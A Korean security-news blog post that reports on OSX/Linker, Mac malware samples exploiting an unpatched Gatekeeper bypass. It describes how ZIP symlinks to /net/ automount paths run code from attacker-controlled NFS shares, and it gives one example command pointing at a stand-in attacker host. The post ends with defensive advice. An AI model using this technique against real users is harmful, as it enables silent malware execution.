포스팅 내용

국내외 보안동향

애플 GateKeeper 우회 버그를 악용하는 새로운 Mac 용 악성코드 발견

New Mac Malware Exploits GateKeeper Bypass Bug that Apple Left Unpatched


Intego의 사이버 보안 연구원들이 지난달 말 공개된 macOS Gatekeeper의 보안 기능에 존재하는 패치되지 않은 보안 취약점에 대해 경고했습니다.


지난주 Intego 팀은 VirusTotal에서 macOS에서 사용자에게 경고를 표시하거나 적절하지 않은 권한으로 신뢰할 수 없는 코드를 실행하는 새로운 macOS 악성코드 샘플 4개를 발견했습니다.


OSX/Linker로 명명된 이 새로운 악성코드는 아직까지 실제 공격 사례는 발견되지 않았으며, 개발 단계인 것으로 추측됩니다.


발견된 악성 샘플들은 GateKeeper 우회 취약점을 악용하지만 공격자의 서버로부터 악성 앱을 다운로드하지는 않습니다.


Intego의 Joshua Long 연구원은 악성코드 제작자가 지난 주까지 탐지 테스트 활동을 진행했던 것으로 추측했습니다.


Long 연구원은 악성 파일 중 하나는 애플 개발자 ID로 서명되어 있었으며, OSX/Linker 디스크 이미지는 OSX/Serfbuyer 애드웨어 개발자의 작품인 것으로 보인다고 밝혔습니다.


하지만 이 악성코드 공격자의 원격 서버와 연결되어 있기 때문에, 공격자는 원격 서버에 정의된 샘플 앱을 악성 앱으로 교체하는 것만으로 실제 타깃에 동일한 샘플을 배포할 수도 있습니다.


MacOS Gatekeeper 우회 취약점


GateKeeper는 애플 macOS에 내장되어 있는 응용프로그램으로, 코드 서명을 요구하고 다운로드된 응용프로그램이 실행되기 전 악성 여부를 확인하여 사용자의 시스템을 악성코드로부터 보호하는 기능을 가지고 있습니다.


즉 인터넷에서 응용 프로그램을 MAC으로 다운로드할 경우, GateKeeper는 해당 프로그램이 애플이 발행한 인증서로 서명되어 있는 경우에만 경고 메시지 없이 실행되도록 허용합니다. 


다운로드하는 응용 프로그램에 서명이 없을 경우 사용자에게 신뢰할 수 없는 프로그램이라는 메시지를 띄우거나 실행을 허용하지 않습니다.


그러나, GateKeeper는 USB 또는 HDD와 같은 외부 드라이브와 네트워크 공유를 "안전한 위치"로 인식하도록 설계되어 있습니다.


"안전한 위치"는 사용자들이 GateKeeper의 애플리케이션 검토 및 프롬프트 없이도 모든 응용 프로그램을 실행할 수 있습니다.


보안 연구원인 Filippo Cavallarin은 지난달 macOS의 정식 기능 2개와 이 취약점을 조합한 악성 행위 방법을 공개했습니다. 


Cavllarin이 이용한 정상 기능 2 가지는 아래와 같습니다:

- Zip 아카이브는 Automount 엔드 포인트를 포함한 임의의 위치를 가리키는 심볼릭 링크 포함 가능

- macOS의 automount 기능은 "/net/"으로 시작하는 등의 "특수" 경로에 접근하는 것으로 원격 서버로부터 자동으로 네트워크 공유 마운트 가능


예를 들어 "ls /net/evil-attacker.com/sharedfolder/"라는 명령어를 사용할 경우 OS가 NFS를 사용하여 원격 호스트의 공유 폴더 내용을 읽을 수 있습니다.


Cavellarin은 macOS가 automount 할 공격자가 제어하는 네트워크 공유로의 심볼릭 링크를 포함한 ZIP 파일을 생성할 수 있었습니다.


피해자가 해당 ZIP 아카이브를 오픈하고 링크를 따라갈 경우, 공격자가 제어하는 네트워크 공유 폴더로 이동하여 악성 실행 파일을 아무런 경고 메시지 없이 실행할 수 있습니다.


Finder가 설계된 방식(예: .app 확장자 숨김, 타이틀 바에 전체 경로 숨김)으로 인해 이 기술은 매우 효과적이고 발견이 어렵습니다.


하지만 새로 발견된 악성코드 샘플은 ZIP 파일이 아니라 디스크 이미지 파일(.dmg)로 악성코드 제작자들은 이 취약점이 디스크 이미지로도 동작할지 확인을 하고 있는 것으로 보입니다.


Cavallarin은 지난 2월 22일, 해당 취약점을 애플에 제보했으며 애플이 90일 내 문제를 패치하지 못하고, 그의 이메일을 무시하기 시작하자 해당 취약점의 PoC를 공유하기로 결정했다고 밝혔습니다.


애플이 이 문제를 패치하기 전까지 네트워크 관리자들은 외부 IP와의 NFS 통신을 차단하고, 개인 사용자들은 의심스러운 출처로부터 받은 이메일의 첨부파일을 열지 말아야 합니다.



출처:

https://thehackernews.com/2019/06/macos-malware-gatekeeper.html

https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass


티스토리 방명록 작성
name password homepage